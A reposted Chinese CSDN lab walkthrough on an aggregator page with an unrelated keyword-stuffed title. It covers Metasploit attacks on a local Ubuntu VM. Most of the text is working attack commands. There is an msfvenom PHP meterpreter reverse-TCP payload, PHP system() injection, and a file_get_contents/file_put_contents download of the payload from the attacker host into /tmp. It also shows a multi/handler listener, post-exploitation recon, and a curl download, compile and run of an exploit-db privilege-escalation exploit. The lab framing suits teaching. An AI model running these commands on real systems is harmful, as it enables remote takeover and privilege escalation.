您的位置:首页 > 游戏 > 游戏 > 佛山应用软件开发_肇庆企业建站模板_每日一则新闻摘抄_域名ip查询

佛山应用软件开发_肇庆企业建站模板_每日一则新闻摘抄_域名ip查询

2025/3/10 18:41:13 来源:https://blog.csdn.net/2303_78851087/article/details/145813826  浏览:    关键词:佛山应用软件开发_肇庆企业建站模板_每日一则新闻摘抄_域名ip查询
佛山应用软件开发_肇庆企业建站模板_每日一则新闻摘抄_域名ip查询

首先metasploit是什么呢,该怎末使用呢

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

下边这篇文章告诉哦你

【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客

然后我们呢开始实验

首先准备环境

我们的kail机 ip 192.168.25.138 (这个相信你们都有)

还有上一篇文章的 Ubuntu 主机 ip 192.168.25.135 (这个就是上一篇下载的那个 没有的 我再次放在下边)

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: 33g3

--来自百度网盘超级会员v3的分享

我们首先打开我们的kail机

输入 ifconfig

我们的ip是192.68.25.138

首先我们先要生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.25.138 LPORT=12345 -f raw >shell.php

不知道msfvenom 是啥的

msfvenom -p 模板 -e 编码模板 -i 编码次数 -b 避免字符集 LHOST(ifconfig查看) LPORT(监听端口) -f 输出文件类型 > 文件名

参考这一篇文章

msfvenom的使用&免杀&外网渗透_msfvalenem-CSDN博客

我就可以看到桌面上有了shell.php

我们来查看一下源代码

我们的目的 就是要把这个攻击载荷 下载到目标主机上

还是一样的

我们首先要开启80端口服务

python3 -m http.server 80

还是老样子

在我们的本机上windows上输入 192.168.25.135

然后打开eval函数 超链接

输入 system 函数

data=system('ls -al');

然后我们查看上一级目录

data=system('ls -al ../');

我们看到了tmp目录 那个临时目录 是谁都可以访问修改的

那我们就进入tmp目录 等下下载到这个目录里

data=system('ls -al ../tmp');

然后我们还是可以用一个反弹shell 然后输入指令 使用wegt或者curl进行下载

这里我们是php代码 咋们可以用php的一个函数来解决

file_get_contents 它可以本地请求 也可以远程http请求

想了解更多的 我们可以看下一篇文章

file_get_contents() 函数详解与使用_php file get contents-CSDN博客

file_get_contents('http://192.168.25.138/shell.php');

看不到内容 我们可以打印出来

echo file_get_contents('http://192.168.25.138/shell.php');

内容跟我们生成的攻击载荷一摸一样

下载我们就要开始写入文件了

file_put_contents函数

不懂得 可以看这一篇文章

php 读写文件 file_put_contents() 与 file_get_contents() 函数用法-CSDN博客

file_put_contents('../tmp/shell.php',file_get_contents('http://192.168.25.138/shell.php'));

现在让我们来查看Ubuntu主机上 有没有下载好没有这个shell.php文件

data=system('ls -al ../tmp');

然后接下来我们启动kail的msf(这里我就不在过多讲解 msf 相信你们都是业内人士)

msfconsole

然后使用监听模块

use exploit/multi/handler

然后设置payload

set payloadphp/meterpreter_reverse_tcp

输入

show options

查看要添加的参数名称

设置参数

set lhost 192.168.25.138 (kail的ip)

set lport 12345 (设置成为与攻击载荷相同的端口)

然后哦我们输入

run

开始监听

然后我们在我们的本机上输入 来访问shell.php

http://192.168.25.135/tmp/shell.php

然后返回kail 已经有了 meterpreter

大家这里不要管我这里的ip怎末变成了192.168.25.136 而不是192.168.25.135(我这里的ip变换了 大家不用管 就按照原来的走)

输入

getuid 查询当前用户

然后查看主机版本

sysinfo

然后我们进入shell

输入id

查询Ubuntu版本

cat /etc/issue

然后我们退出shell 到 meterpreter

exit

我们也可以使用 msf自带的后渗透模块来查询

run post/multi/recon/local_exploit_suggester

然后等待查询结束

这里没有查询到

然后还是一样的

在这个漏洞库查找

https://www.exploit-db.com/exploits/37292

还是上篇找到的 37292.c

虽然上次没有提权成功 因为这个漏洞不稳定

我们这次再试试

首先进入shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

然后下载

curl http://192.168.25.138/37292.c -o /tmp/37292.c

然后进行编译

gcc 37292.c -o exp

输入

./exp

进行运行

这里还是没有成功 哎 太可惜了 很想给你们运行一遍

反正思路就是这个思路

大家可以找别的版本来运行一遍

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com